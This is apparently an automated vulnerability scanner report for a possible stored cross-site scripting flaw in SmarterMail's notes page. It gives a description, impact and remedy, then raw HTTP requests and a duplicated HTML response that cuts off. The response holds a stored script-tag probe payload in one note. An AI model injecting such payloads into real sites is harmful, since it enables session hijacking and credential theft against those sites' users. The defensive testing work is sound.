zNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQIAAAADa2V5BXZhbHVlAQIGBQAAAAdFbmFibGVkCAEBAfr////8////BgcAAAAEVGV4dAoB+P////z///8GCQAAAApSZXNvdXJjZUlEBgoAAAAFQFVzZXIB9f////z///8GDAAAAAhTZWxlY3RlZAgBAAHz/////P///wYOAAAAClBhZ2VWaWV3SUQGDwAAABFwdlVzZXJJbmZvcm1hdGlvbgtkBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WDQVAY3RsMDA..
[Possible] Permanent Cross-site Scripting
[Possible] Permanent Cross-site Scripting
2
TOTAL
IMPORTANT
Permanent XSS (Cross-site Scripting) allows an attacker to execute dynamic scripts (Javascript, VbScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly and to steal the user's credentials. This happens because the input entered by the user has been interpreted by HTML/Javascript/VbScript within the browser.
Permanent means that the attack will be stored in the back-end system. In normal XSS attacks an attack needs to e-mail the victim but in a permanent XSS an attacker can just execute the attack and wait for users to see the affected page. As soon as someone visits the page, the attacker's stored payload will get executed.
XSS targets the users of the application instead of the server. Although this is a limitation, since it only allows attackers to hijack other users' session the attacker might attack an administrator to gain full control over the application.
Impact
Permanent XSS is a dangerous issue that has many exploitation vectors, some of which includes:
- User session sensitive information such as cookies can be stolen.
- XSS can enable client-side worms which could modify, delete or steal other users' data within the application.
- The website can be redirected to a new location, defaced or used as a phishing site.
Remedy
The issue occurs because the browser interprets the input as active HTML, Javascript or VbScript. To avoid this, all input and output from the application should be filtered. Output should be filtered according to the output format and location. Typically the output location is HTML. Where the output is HTML ensure that all active content is removed prior to its presentation to the server.
Prior to sanitizing user input, ensure you have a pre-defined list of both expected and acceptable characters with which you populate a white-list. This list needs only be defined once and should be used to sanitize and validate all subsequent input.
There are a number of pre-defined, well structured white-list libraries available for many different environments, good examples of these include, OWASP Reform and Microsoft Anti Cross-site Scripting libraries are good examples.
Remedy References
External References
|
- /Main/frmNotes.aspx
/Main/frmNotes.aspx |
Injection URL
http://vulnerable.smartermail.7.x.host:9998/Main/frmNotes.aspx
Injection Request
GET /Main/frmNotes.aspx HTTP/1.1
Referer: http://vulnerable.smartermail.7.x.host:9998/Main/frmNote.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Host: vulnerable.smartermail.7.x.host:9998
Cookie: ASP.NET_SessionId=e25dkk45nuvkgrr4d1exuxrn; SelectedLanguage=en
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Referer: http://vulnerable.smartermail.7.x.host:9998/Main/frmNote.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Host: vulnerable.smartermail.7.x.host:9998
Cookie: ASP.NET_SessionId=e25dkk45nuvkgrr4d1exuxrn; SelectedLanguage=en
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Identification Request
GET /Main/frmNotes.aspx HTTP/1.1
Referer: http://vulnerable.smartermail.7.x.host:9998/Main/frmNote.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Host: vulnerable.smartermail.7.x.host:9998
Cookie: ASP.NET_SessionId=e25dkk45nuvkgrr4d1exuxrn; SelectedLanguage=en
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Referer: http://vulnerable.smartermail.7.x.host:9998/Main/frmNote.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Host: vulnerable.smartermail.7.x.host:9998
Cookie: ASP.NET_SessionId=e25dkk45nuvkgrr4d1exuxrn; SelectedLanguage=en
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Injection Response
HTTP/1.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Sun, 03 Oct 2010 06:20:28 GMT
X-AspNet-Version: 2.0.50727
Content-Encoding:
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 10797
Connection: Close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
My Notes - hoytllc.com - SmarterMail
</title><meta http-equiv="Page-Enter" content="blendTrans(Duration=0)" /><meta http-equiv="Page-Exit" content="blendTrans(Duration=0)" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=Main/&rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=Mail/&rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=Telerik&rtl=false" rel="stylesheet" type="text/css" />
<!--[if lte IE 6]>
<style type="text/css">@import '/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=BrowserOverrides/ie6&rtl=false';</style>
<![endif]-->
<meta http-equiv="cache-control" content="no-cache"><meta http-equiv="pragma" content="no-cache"></head>
<body class="" dir="ltr">
<form method="post" action="frmNotes.aspx" id="aspnetForm">
<div>
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTExNDA1MDIwMjQPFggeCF9fX1RpdGxlBQhNeSBOb3Rlcx4QX19fUmVzdWx0RmFpbHVyZWUeEF9fX1Jlc3VsdFN1Y2Nlc3NlHgRfc0dGZxYCZg9kFgICAQ9kFgwCAw9kFgICAQ9kFgQCAQ8PFgQeC05hdmlnYXRlVVJMZR4XQ2xpZW50U2lkZVNjcmlwdE9uQ2xpY2sFOk9wZW5OZXdNZXNzYWdlKCdmcm1Ob3RlLmFzcHg/cmV0PTEmcG9wdXA9dHJ1ZScsIDYwMCwgNTAwKTtkZAIDDw8WAh4OTmF2aWdhdGVUYXJnZXQFC2RvdWJsZWNsaWNrZGQCBA8WAh4Fc3R5bGUFDWRpc3BsYXk6bm9uZTsWAgIBD2QWBgIBDw9kFgIeCk9uS2V5UHJlc3MFS3JldHVybiBFbnRlckhhbmRsZXIoZXZlbnQsIGZ1bmN0aW9uKCl7X19kb1Bvc3RCYWNrKCdjdGwwMCRTUEgkYnRuR28nLCcnKX0pO2QCAg8QD2QWAh8IBUtyZXR1cm4gRW50ZXJIYW5kbGVyKGV2ZW50LCBmdW5jdGlvbigpe19fZG9Qb3N0QmFjaygnY3RsMDAkU1BIJGJ0bkdvJywnJyl9KTsQFQYKQWxsIENvbG9ycwVXaGl0ZQZZZWxsb3cEUGluawVHcmVlbgRCbHVlFQYABXdoaXRlBnllbGxvdwRwaW5rBWdyZWVuBGJsdWUUKwMGZ2dnZ2dnZGQCAw8QD2QWAh8IBUtyZXR1cm4gRW50ZXJIYW5kbGVyKGV2ZW50LCBmdW5jdGlvbigpe19fZG9Qb3N0QmFjaygnY3RsMDAkU1BIJGJ0bkdvJywnJyl9KTsQFQMOQWxsIENhdGVnb3JpZXMLTm8gQ2F0ZWdvcnkBMRUDAAEgATEUKwMDZ2dnZGQCBg8WAh4HVmlzaWJsZWhkAgcPZBYCZg9kFgICAQ8WAh8JaBYCAgEPFgIeBFRleHRlZAIIDxYCHwloZAILD2QWAgIDD2QWAgIBD2QWAmYPZBYCAgEPDxYCHwoFDDEwMzkgbm90ZShzKWRkGAIFF2N0bDAwJE5hdlBIJEh5cGVyUGFnZXIxDwUgY3RsMDBfTVBIX0h5cGVyR3JpZDF8MjF8MHw5fDUwfDBkBRRjdGwwMCRNUEgkSHlwZXJHcmlkMQ8FMVRydWV8VHJ1ZXx8RmFsc2V8VHJ1ZXxyZWFsZGF0ZSBkZXNjfEZhbHNlfEZhbHNlfDBky4b6qG1iTmWcfMdpbViMtvgbCMQ=" />
</div>
<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>
<script src="/WebResource.axd?d=lFfe_wSSLYBiWo0hdQTqNA2&t=633802452069218315" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=9LtTppofNdzfPwjqAv6ngOF_m3Ok_PFqwhuv90rOoA_SHM2fVCRbipJCEnE9OMFtjNNZaXF1BttRFjWpHbAPstnprDdIVLeDszcVmLsdfwM1&t=ffffffff8fb8c655" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=PkU8JqZ1AqOnNUfS9wB-O8XFAfH3kdpAehi09BJok9KiMBXqeEWZLvdsdUFLbPxYAD0iIeAHZBtPh1mybNd0fzbzD1H1EGEbNX_3WW4l9J01&t=ffffffffec2d9970" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=PkU8JqZ1AqOnNUfS9wB-O8XFAfH3kdpAehi09BJok9KiMBXqeEWZLvdsdUFLbPxYxlutgliktFrtyUOE-2vtH5p7RzBBFeKiwavJVGKo3xk1&t=ffffffffec2d9970" type="text/javascript"></script>
<script type="text/javascript">
self.EnableAnimations = false;
</script>
<script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB60CF5B830100_1.6.3925.24513_&fileMask="></script>
<script type="text/javascript">
//<![CDATA[
Sys.WebForms.PageRequestManager._initialize('ctl00$ScriptManager1', document.getElementById('aspnetForm'));
Sys.WebForms.PageRequestManager.getInstance()._updateControls(['tctl00$UpdatePanel1','tctl00$MPH$UP1','tctl00$NavPH$UpdatePanel2','tctl00$CntPH$UpdatePanel3'], ['ctl00$BPH$DeleteIcon','ctl00$SPH$btnGo','ctl00$SPH$btnClear'], [], 90);
//]]>
</script>
<div id="ctl00_TitleBar_HeaderPanel" class="PageTitle">
<div class="RoundedPageTitleLeft">
<div id="PageTitle" class="PageTitleText">
My Notes
</div>
</div>
</div>
<div id="ctl00_ButtonRow" class="ButtonBar">
<div class="ButtonBarLeft">
<div id="ctl00_BPH_btnAddNote" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="OpenNewMessage('frmNote.aspx?ret=1&popup=true', 600, 500);; return false;"><span class="BBInner">New</span></a></div>
<div id="ctl00_BPH_EditIcon" class="BBButton"><a class="ButtonBarAnchor" href="#" tabindex='0' onclick="DoEdit_ctl00_BPH_EditIcon(); return false;"><span class="BBInner">Edit</span></a></div>
<div id="ctl00_BPH_DeleteIcon" class="BBButton"><a class="ButtonBarAnchor" href="#" tabindex='0' onclick="DoDeleteQuery_ctl00_BPH_DeleteIcon(); return false;"><span class="BBInner">Delete</span></a></div>
<div id="ctl00_BPH_btnShowHideSearchBar" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="ToggleSearch();; return false;"><span class="BBInner">Search</span></a></div>
</div>
<div class="ButtonBarRight">
</div>
<div class="ButtonBarClear">
<div class="ie6fix">
</div>
</div>
</div>
<div id="ctl00_SearchRow" class="SearchRow" style="display:none;">
<table class="SearchContents">
<tr>
<td class="SCText">
Search
<input name="ctl00$SPH$txtSearchString" type="text" id="ctl00_SPH_txtSearchString" OnKeyPress="return EnterHandler(event, function(){__doPostBack('ctl00$SPH$btnGo','')});" />
<select name="ctl00$SPH$lstColors" id="ctl00_SPH_lstColors" OnKeyPress="return EnterHandler(event, function(){__doPostBack('ctl00$SPH$btnGo','')});">
<option value="">All Colors</option>
<option value="white">White</option>
<option value="yellow">Yellow</option>
<option value="pink">Pink</option>
<option value="green">Green</option>
<option value="blue">Blue</option>
</select>
<select name="ctl00$SPH$lstCategories" id="ctl00_SPH_lstCategories" OnKeyPress="return EnterHandler(event, function(){__doPostBack('ctl00$SPH$btnGo','')});">
<option selected="selected" value="">All Categories</option>
<option value=" ">No Category</option>
<option value="1">1</option>
</select>
</td>
<td class="SCButtons">
<div id="ctl00_SPH_btnGo" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick=" __doPostBack('ctl00$SPH$btnGo',''); return false;"><span class="BBInner">Find Now</span></a></div>
<script type="text/javascript">
window.setInterval("if (invalid) { invalid = false; Refresh(); }", 333);
function Refresh() { __doPostBack('ctl00$SPH$btnGo',''); }
function ClearText()
{
var el = document.getElementById('ctl00_SPH_txtSearchString');
if (el) el.value = "";
el = document.getElementById('ctl00_SPH_lstCategories');
if (el) el.selectedIndex = 0;
el = document.getElementById('ctl00_SPH_lstColors');
if (el) el.selectedIndex = 0;
}
function DoubleClick(newUrl, uid, isNew)
{
OpenUniqueNewMessage(newUrl, 600, 500, uid);
}
</script>
<div id="ctl00_SPH_btnClear" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="ClearText(); __doPostBack('ctl00$SPH$btnClear',''); return false;"><span class="BBInner">Clear</span></a></div><script type='text/javascript'>ToggleSearchClear = function() { ClearText(); __doPostBack('ctl00$SPH$btnClear',''); return false; }</script>
</td>
</tr>
</table>
</div>
<span id="ctl00_UpdatePanel1">
</span>
<div id="Scrollable" class="ContentDiv">
<span id="ctl00_MPH_HyperContextMenu1">
<!-- HyperMenu -->
<div class='hmMenuBar '><div class='hmScroller'><div class='hmScrollUp'></div><ul class='hmMenu hmMenuBar hmSub hmContext hmList' id='ctl00_MPH_ctl01' name='ctl00$MPH$ctl01' style='z-index:800'>
<li class='hmItem hmFirst' id='ctl00_MPH_ctl01_hm0' style='z-index: 800'><a class='hmA' href='#'>Edit</a></li>
<li class='hmItem hmLast' id='ctl00_MPH_ctl01_hm1' style='z-index: 800'><a class='hmA' href='#'>Delete</a></li>
</ul>
<div class='hmScrollDown'></div></div>
</div>
</span>
<div id="ctl00_MPH_UP1">
<div class="HyperGridWrapper" id="ctl00_MPH_HyperGrid1">
<div class="HyperGrid">
<table class="HyperGrid" id="ctl00_MPH_HyperGrid1_Table">
<thead>
<tr><th scope="col" class="showsel lc CheckBoxColumn" style="overflow: hidden"><input type="checkbox" id="ctl00_MPH_HyperGrid1CheckAll" name="ctl00$MPH$HyperGrid1CheckAll" /></th><th scope="col" class="SmallImage" style="overflow: hidden"> </th><th scope="col" class="leftpad" style="overflow: hidden"><a class='SortableHeader' href="javascript:__doPostBack('ctl00$MPH$HyperGrid1','sort=text')">Note</a></th><th scope="col" class="rc leftpad" style="overflow: hidden"><a class='SortableHeader' href="javascript:__doPostBack('ctl00$MPH$HyperGrid1','sort=realdate')">Date<img src='/App_Themes/Default/Images/Misc/down.gif' /></a></th></tr>
</thead>
<tbody>
<tr class="firstrow"><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_OWQ2MGNiZjQyOTFiNGY3OWE4OTBlNTc1YzJhZWZhN2U-" name="ctl00_MPH_HyperGrid1_CB64_OWQ2MGNiZjQyOTFiNGY3OWE4OTBlNTc1YzJhZWZhN2U-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;"> </td></tr></table></td><td class="leftpad">1</td><td class="rc leftpad">10/3/2010</td></tr>
<tr class="alt"><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_MGFhYWY2Yjg0YmM0NDJmYzk2NjE3NzQ1ZTQyZDc1ZDE-" name="ctl00_MPH_HyperGrid1_CB64_MGFhYWY2Yjg0YmM0NDJmYzk2NjE3NzQ1ZTQyZDc1ZDE-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;"> </td></tr></table></td><td class="leftpad">1</td><td class="rc leftpad">10/3/2010</td></tr>
<tr><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_YWM2MDExYzZhODA5NGUxZTkyOTQ3ZDA1OTk5YTA2Y2E-" name="ctl00_MPH_HyperGrid1_CB64_YWM2MDExYzZhODA5NGUxZTkyOTQ3ZDA1OTk5YTA2Y2E-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;"> </td></tr></table></td><td class="leftpad">'"--><script>netsparker(0x009625)</script></td><td class="rc leftpad">10/3/2010</td></tr>
<tr class="alt"><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_MWRjMzVlNjMyZGM0NGFlN2E2NWJhMzAwNGUyMzg1YzU-" name="ctl00_MPH_HyperGrid1_CB64_MWRjMzVlNjMyZGM0NGFlN2E2NWJhMzAwNGUyMzg1YzU-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;"> </td></tr></table></td><td class="leftpad">1</td><td class="rc leftpad">10/3/2010</td></tr>
<tr><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_ZjRhYmEzZWU3NDlhNDk4Yzk4ZGRlM2MyMGFlZTNjMjQ-" name="ctl00_MPH_HyperGrid1_CB64_ZjRhYmEzZWU3NDlhNDk4Yzk4ZGRlM2MyMGFlZTNjMjQ-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;"> </td></tr></table></td><td class="leftpad">1</td><td class="rc leftpad">10/3/2010</td></tr>
<tr class="alt"><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_YmYwMzMzMmIzNjU2NGE1YmE0MTMzNjVhYWM4NWM5MmU-" name="ctl00_MPH_HyperGrid1_CB64_YmYwMzMzMmIzNjU2NGE1YmE0MTMzNjVhYWM4NWM5MmU-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;"> </td></tr></table></td><td class="leftpad">1</td><td class="rc leftpad">10/3/2010</td></tr>
<tr><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_M2EzYzllZmVhOGNiNDNhNGE4MWU0ZTM1NzZhMjk2Zjk-" name="ctl00_MPH_HyperGrid1_CB64_M2EzYzllZmVhOGNiNDNhNGE4MWU0ZTM1NzZhMjk2Zjk-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;"> </td></tr></table></td><td class="leftpad">1</td><td class="rc leftpad">10/3/2010</td></tr>
<tr class="alt"><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_NTM3ZTU2MWQ0ODBiNGY5MDllYzk3ZTFjOTgwNDE5NDM-" name="ctl00_MPH_HyperGrid1_CB64_NTM3ZTU2MWQ0ODBiNGY5MDllYzk3ZTFjOTgwNDE5NDM-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;"> </td></..
Server: SmarterTools/2.0.3925.24451
Date: Sun, 03 Oct 2010 06:20:28 GMT
X-AspNet-Version: 2.0.50727
Content-Encoding:
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 10797
Connection: Close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
My Notes - hoytllc.com - SmarterMail
</title><meta http-equiv="Page-Enter" content="blendTrans(Duration=0)" /><meta http-equiv="Page-Exit" content="blendTrans(Duration=0)" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=Main/&rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=Mail/&rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=Telerik&rtl=false" rel="stylesheet" type="text/css" />
<!--[if lte IE 6]>
<style type="text/css">@import '/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=BrowserOverrides/ie6&rtl=false';</style>
<![endif]-->
<meta http-equiv="cache-control" content="no-cache"><meta http-equiv="pragma" content="no-cache"></head>
<body class="" dir="ltr">
<form method="post" action="frmNotes.aspx" id="aspnetForm">
<div>
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTExNDA1MDIwMjQPFggeCF9fX1RpdGxlBQhNeSBOb3Rlcx4QX19fUmVzdWx0RmFpbHVyZWUeEF9fX1Jlc3VsdFN1Y2Nlc3NlHgRfc0dGZxYCZg9kFgICAQ9kFgwCAw9kFgICAQ9kFgQCAQ8PFgQeC05hdmlnYXRlVVJMZR4XQ2xpZW50U2lkZVNjcmlwdE9uQ2xpY2sFOk9wZW5OZXdNZXNzYWdlKCdmcm1Ob3RlLmFzcHg/cmV0PTEmcG9wdXA9dHJ1ZScsIDYwMCwgNTAwKTtkZAIDDw8WAh4OTmF2aWdhdGVUYXJnZXQFC2RvdWJsZWNsaWNrZGQCBA8WAh4Fc3R5bGUFDWRpc3BsYXk6bm9uZTsWAgIBD2QWBgIBDw9kFgIeCk9uS2V5UHJlc3MFS3JldHVybiBFbnRlckhhbmRsZXIoZXZlbnQsIGZ1bmN0aW9uKCl7X19kb1Bvc3RCYWNrKCdjdGwwMCRTUEgkYnRuR28nLCcnKX0pO2QCAg8QD2QWAh8IBUtyZXR1cm4gRW50ZXJIYW5kbGVyKGV2ZW50LCBmdW5jdGlvbigpe19fZG9Qb3N0QmFjaygnY3RsMDAkU1BIJGJ0bkdvJywnJyl9KTsQFQYKQWxsIENvbG9ycwVXaGl0ZQZZZWxsb3cEUGluawVHcmVlbgRCbHVlFQYABXdoaXRlBnllbGxvdwRwaW5rBWdyZWVuBGJsdWUUKwMGZ2dnZ2dnZGQCAw8QD2QWAh8IBUtyZXR1cm4gRW50ZXJIYW5kbGVyKGV2ZW50LCBmdW5jdGlvbigpe19fZG9Qb3N0QmFjaygnY3RsMDAkU1BIJGJ0bkdvJywnJyl9KTsQFQMOQWxsIENhdGVnb3JpZXMLTm8gQ2F0ZWdvcnkBMRUDAAEgATEUKwMDZ2dnZGQCBg8WAh4HVmlzaWJsZWhkAgcPZBYCZg9kFgICAQ8WAh8JaBYCAgEPFgIeBFRleHRlZAIIDxYCHwloZAILD2QWAgIDD2QWAgIBD2QWAmYPZBYCAgEPDxYCHwoFDDEwMzkgbm90ZShzKWRkGAIFF2N0bDAwJE5hdlBIJEh5cGVyUGFnZXIxDwUgY3RsMDBfTVBIX0h5cGVyR3JpZDF8MjF8MHw5fDUwfDBkBRRjdGwwMCRNUEgkSHlwZXJHcmlkMQ8FMVRydWV8VHJ1ZXx8RmFsc2V8VHJ1ZXxyZWFsZGF0ZSBkZXNjfEZhbHNlfEZhbHNlfDBky4b6qG1iTmWcfMdpbViMtvgbCMQ=" />
</div>
<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>
<script src="/WebResource.axd?d=lFfe_wSSLYBiWo0hdQTqNA2&t=633802452069218315" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=9LtTppofNdzfPwjqAv6ngOF_m3Ok_PFqwhuv90rOoA_SHM2fVCRbipJCEnE9OMFtjNNZaXF1BttRFjWpHbAPstnprDdIVLeDszcVmLsdfwM1&t=ffffffff8fb8c655" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=PkU8JqZ1AqOnNUfS9wB-O8XFAfH3kdpAehi09BJok9KiMBXqeEWZLvdsdUFLbPxYAD0iIeAHZBtPh1mybNd0fzbzD1H1EGEbNX_3WW4l9J01&t=ffffffffec2d9970" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=PkU8JqZ1AqOnNUfS9wB-O8XFAfH3kdpAehi09BJok9KiMBXqeEWZLvdsdUFLbPxYxlutgliktFrtyUOE-2vtH5p7RzBBFeKiwavJVGKo3xk1&t=ffffffffec2d9970" type="text/javascript"></script>
<script type="text/javascript">
self.EnableAnimations = false;
</script>
<script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB60CF5B830100_1.6.3925.24513_&fileMask="></script>
<script type="text/javascript">
//<![CDATA[
Sys.WebForms.PageRequestManager._initialize('ctl00$ScriptManager1', document.getElementById('aspnetForm'));
Sys.WebForms.PageRequestManager.getInstance()._updateControls(['tctl00$UpdatePanel1','tctl00$MPH$UP1','tctl00$NavPH$UpdatePanel2','tctl00$CntPH$UpdatePanel3'], ['ctl00$BPH$DeleteIcon','ctl00$SPH$btnGo','ctl00$SPH$btnClear'], [], 90);
//]]>
</script>
<div id="ctl00_TitleBar_HeaderPanel" class="PageTitle">
<div class="RoundedPageTitleLeft">
<div id="PageTitle" class="PageTitleText">
My Notes
</div>
</div>
</div>
<div id="ctl00_ButtonRow" class="ButtonBar">
<div class="ButtonBarLeft">
<div id="ctl00_BPH_btnAddNote" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="OpenNewMessage('frmNote.aspx?ret=1&popup=true', 600, 500);; return false;"><span class="BBInner">New</span></a></div>
<div id="ctl00_BPH_EditIcon" class="BBButton"><a class="ButtonBarAnchor" href="#" tabindex='0' onclick="DoEdit_ctl00_BPH_EditIcon(); return false;"><span class="BBInner">Edit</span></a></div>
<div id="ctl00_BPH_DeleteIcon" class="BBButton"><a class="ButtonBarAnchor" href="#" tabindex='0' onclick="DoDeleteQuery_ctl00_BPH_DeleteIcon(); return false;"><span class="BBInner">Delete</span></a></div>
<div id="ctl00_BPH_btnShowHideSearchBar" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="ToggleSearch();; return false;"><span class="BBInner">Search</span></a></div>
</div>
<div class="ButtonBarRight">
</div>
<div class="ButtonBarClear">
<div class="ie6fix">
</div>
</div>
</div>
<div id="ctl00_SearchRow" class="SearchRow" style="display:none;">
<table class="SearchContents">
<tr>
<td class="SCText">
Search
<input name="ctl00$SPH$txtSearchString" type="text" id="ctl00_SPH_txtSearchString" OnKeyPress="return EnterHandler(event, function(){__doPostBack('ctl00$SPH$btnGo','')});" />
<select name="ctl00$SPH$lstColors" id="ctl00_SPH_lstColors" OnKeyPress="return EnterHandler(event, function(){__doPostBack('ctl00$SPH$btnGo','')});">
<option value="">All Colors</option>
<option value="white">White</option>
<option value="yellow">Yellow</option>
<option value="pink">Pink</option>
<option value="green">Green</option>
<option value="blue">Blue</option>
</select>
<select name="ctl00$SPH$lstCategories" id="ctl00_SPH_lstCategories" OnKeyPress="return EnterHandler(event, function(){__doPostBack('ctl00$SPH$btnGo','')});">
<option selected="selected" value="">All Categories</option>
<option value=" ">No Category</option>
<option value="1">1</option>
</select>
</td>
<td class="SCButtons">
<div id="ctl00_SPH_btnGo" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick=" __doPostBack('ctl00$SPH$btnGo',''); return false;"><span class="BBInner">Find Now</span></a></div>
<script type="text/javascript">
window.setInterval("if (invalid) { invalid = false; Refresh(); }", 333);
function Refresh() { __doPostBack('ctl00$SPH$btnGo',''); }
function ClearText()
{
var el = document.getElementById('ctl00_SPH_txtSearchString');
if (el) el.value = "";
el = document.getElementById('ctl00_SPH_lstCategories');
if (el) el.selectedIndex = 0;
el = document.getElementById('ctl00_SPH_lstColors');
if (el) el.selectedIndex = 0;
}
function DoubleClick(newUrl, uid, isNew)
{
OpenUniqueNewMessage(newUrl, 600, 500, uid);
}
</script>
